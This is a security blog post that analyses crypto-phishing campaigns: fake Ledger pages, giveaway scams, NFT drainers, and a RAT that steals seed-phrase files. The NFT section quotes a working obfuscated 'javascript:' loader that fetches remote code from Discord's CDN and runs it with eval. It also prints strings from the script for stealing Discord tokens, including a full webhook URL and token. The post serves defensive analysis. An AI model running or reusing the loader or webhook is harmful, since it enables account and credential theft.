A Whirlwind Tour Of Crypto Phishing
The post-pandemic world has seen cryptocurrencies and blockchain products in general catapult in valuation and adoption. “Web3”, “DeFi”, and “NFT” have become household terms and the sector is growing so fast that people and businesses are pouring in with dollar signs in their eyes and high hopes to get a piece of the pie. A massive land grab reminiscent of the dot com bubble is taking place with fortunes amassed in the blink of an eye and wiped out just as quickly due to extreme price volatility, regulatory frothiness, hacks, and scams.
Like sharks to chum, the malvertisers have long since arrived to play their role. In this blog post we will look at several chains that start with an ad and end with cryptocurrency theft, usually via phishing.
Hardware Wallets
When it comes to blockchain based assets like Bitcoin, Ethereum, and many others, a private key is used to sign transactions. The transactions are then broadcast onto the blockchain in order to send funds or interact with smart contracts. Managing private keys is hard, so this is typically done by wallet software. Most wallets, during the “setup” stage will generate a deterministic “seed phrase” that users can use to backup their wallet. Seed phrases are a very helpful abstraction, because they consist of human readable words as opposed to gibberish. So let’s say that you have a wallet on your laptop, but the laptop gets damaged, lost, or stolen. If you have your seed phrase secure, you can restore you wallet on a new laptop and regain control of funds that would otherwise be lost.
A hardware wallet is a physical device that is used to secure crypto assets. It adds an extra layer of security by requiring the user to physically interact with the device in order to confirm transactions. This way, funds won’t get sent and interactions won’t happen by the wallet software alone initializing a transaction. Of course, if the seed phrase for the hardware wallet were to get leaked, then the point is moot.
Enter malvertisers…
These are search ads that target Ledger related keywords. (Ledger and Trezor are the two brands leading the hardware crypto wallet space.) Ledger Live is the companion software that is used to an operate a Ledger Hardware wallet.
These ads link to cloaked phishing pages that masquerade as Ledger Live and try to get victims to enter their seed phrase:
Ledger, of course, is well aware of phishing as an existential threat to their customers and do attempt to drive the point home to their customers that the seed phrase is sacred and there is no reason to ever reveal it, but still it remains the premier technique for thieves.
Giveaway Scams
Social media also reigns as a popular channel for attacks of a similar flavor. Creative threat actors are able to orchestrate marketing funnels that lure victims in a subtle matter and escalate towards a phishing payload.
Here’s a great example that starts with a sponsored Instagram story from an account that very believably looks like it belongs to Vitalik Buterin, the founder of Ethereum. Especially interesting is that the post being promoted appears technical (“account abstraction proposal”), which is very much aligned with the type of content that Vitalik is known to share.
A would be victim might be surprised to see Vitalik has an instagram presence, and quickly click through to the profile, where they would see a hundreds of thousands of followers.
At this point, one might follow the account and forget about it until a few days later when this familiar scheme appears in a story posted by Vitalik, and the rest is history.
Recently, we have seen a scam with a similar flavor, but much darker. Fake websites that claim to be raising crypto funds to provide Ukraine with war relief:
For >90% of the crypto phishing pages that we see, the mechanics are nearly identical and low tech: Emulate the target brand, ask the victim to connect their wallet, and prompt for the seed phrase:
But somewhat surprisingly, this is often haphazardly done:
The funny thing is that this type of incompetence is splashing around all over the place when it comes to Web3 phishing. Take for example this website that we recently saw go live:
Visually, it’s a nicely done fake of the registration page for the “Gangster All Star” NFT project found here -> https://register.gangsterallstar.com/, but unfortunately for the folks behind the scheme, it doesn’t even work due to CORS issues with the implementation.
Despite the fact that the malicious site appears to be broken (or perhaps still under construction), we do see a clever attempt to host the malicious JavaScript on a Discord owned domain:
javascript:fetch(/*xmarksthespot.*/atob(/*Whitelist.*/'aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTM1MTA4MzQ4MzYwMTM0NjY2Lzk1MTkxMDEzMDY5NjQ3ODg4MC94Lmpz')).then(leaving => leaving.text()).then(successfully => eval(successfully))
cdn.discordapp.com is the home of media uploads on Discord.
At this time a full analysis of x.js is beyond the scope of this post, but we were able to dump some strings during a preliminary analysis:
{
"tCaTr": "You must be logged in to be verified!",
"VLIfL": "not discord",
"zjtSw": "httVz",
"PYpUd": "hilBt",
"RDOhl": "hUhwI",
"YFxdN": "QZveY",
"pGiOE": "fLEax",
"WzyaG": "bMors",
"nnmVT": "HjhYS",
"xdZiY": "(((.+)+)+)+$",
"eorVo": "return (function() ",
"SmSId": "{}.constructor(\"return this\")( )",
"hSOfp": "RXkIJ",
"JfwQW": "POST",
"fFjJA": "application/json",
"uTPKN": "lpGeS",
"GTCOa": "ZAHvL",
"TgnuJ": "htPPV",
"QVwzX": "NLjuq",
"YDyKm": "nHpUC",
"LZtzQ": "bBGYi",
"uLHAM": "oxqpQ",
"noJTY": "AVAFo",
"XTkiZ": "kSGHS",
"eWKtO": "TIOyk",
"OMtYB": "log",
"FNpyg": "warn",
"BLjkX": "info",
"LmRQM": "error",
"fiVSQ": "exception",
"tbiTg": "table",
"wFORl": "trace",
"WpDWO": "ZfGRe",
"epmIH": "mROhB",
"qrJNY": "sXEBm",
"uXpno": "https://discord.com/api/v9/users/@me",
"XjzYq": "NbFEb",
"kZSAk": "cakNw",
"SEkWt": "YkYRW",
"bkSGs": "SyUyv",
"eEJEC": "User",
"UsUtV": ":e_mail: Email",
"nppIo": "Not Verified",
"YKPbw": ":mobile_phone: Phone",
"rwYHh": "Token",
"dLGGN": "Login script",
"cWskP": "beforeunload",
"oKqpj": "https://discord.com/api/webhooks/951908349677568091/4N7ccrI6NWBsD-Gw7BIs3MTyYm037ixS1iJvzwiQESe1z_gE6Se6j5JPMmQArspuJ4dF",
"DckyP": "discord.com",
"DcpUu": "iframe",
"klTDd": "display:none",
"ltDUi": "load"
}A closer look at that webhook link potentially reveals the true intentions behind this phishing page:
$ curl https://discord.com/api/webhooks/951908349677568091/4N7ccrI6NWBsD-Gw7BIs3MTyYm037ixS1iJvzwiQESe1z_gE6Se6j5JPMmQArspuJ4dF | jq .
{
"type": 1,
"id": "951908349677568091",
"name": "Spidey Bot",
"avatar": null,
"channel_id": "951907890422222938",
"guild_id": "927995455508447242",
"application_id": null,
"token": "4N7ccrI6NWBsD-Gw7BIs3MTyYm037ixS1iJvzwiQESe1z_gE6Se6j5JPMmQArspuJ4dF"
}
But not all Web3 scams are blunders — some combine clever technical implementation with good timing in order to rapidly wreak havoc. One of these attacks went live on 03/20/2022 and began with widespread twitter spam originating from seemingly verified accounts:
Victims are offered the promise of a very highly coveted token in exchange for 0.33 ETH:
If we look at the code under the hood, we are met with a pretty well thought out scheme, but only after some really hateful/nasty comments ironically directed towards would be plagiarists of the attackers code:
After victims connect their wallet, the site posts the address to its own backend api in order to check the victim’s balance and whether or not they own NFTs:
Once the relevant details are gathered, victims are tricked into authorizing transactions that send their valuable NFTs and/or the 0.33ETH to claim the Ape Coin directly to the attacker. Here’s the code that does it.
Stolen NFTs are then sold off on OpenSea. We can see just how lucrative this scheme has been by watching the address on Etherscan:
As the phishing attack continues, the bad actors behind the site rotate their address, so the $136k stolen so far only represents a portion of the final haul.
Of course, not all phishing attacks are ad-powered either, some are hyper-targeted.
Jorge Ledezma, a generative artist working with NFTs shared this experience with us:
This is a common scenario where scammers will approach artists who they know to be involved with crypto and ask for a commissioned work. They will then send an archive of “reference photos” which unpacks to malware.
In this case:
Exact_sizes_to_order_from_the_artist.rar
Which unpacks to a Windows executable that is very poorly disguised as a PDF:
Exact sizes to order from the artist_document.pdf.pif
Virus Total gives us a clue:
While a comprehensive analysis of this malware is outside of the scope of this post, a cursory overview provided by Taha Karim shows us that this is indeed a RAT with C2 in Seychelles.
More info @ AlienVault:
On launch, this piece of malware scans the Victim’s drive for .txt files that contain the keywords ‘key’, ‘wallet’, and ‘seed’ in the filename or body and posts those back home to the C2.
Opsec Reminder: Please don’t store your private keys in text files on your device.
Impact & Scope
Over the course of any given week, we will detect several hundred newly active Web3 phishing domains and/or campaigns in addition to those targeting specific Web3 brands that we monitor.
If we look at the prevalence of these types of campaigns by target and type, we see some of the following statistics:
- Approximately 1 in 5 Web3 phishing attacks that are promoted via malvertising are giveaway scams.
- 30% of all scams that we we have detected in the last 7 days somehow abuse or piggyback off of the Coinbase brand.
- 1/4 of all Web3 phishing campaigns are seed phrase / fake wallet campaigns.
- Of those, 20% target the Ledger brand explicitly.
- The Axie Infinity brand is one of the hotter targets with 10 new IOCs per day on average in recent weeks.
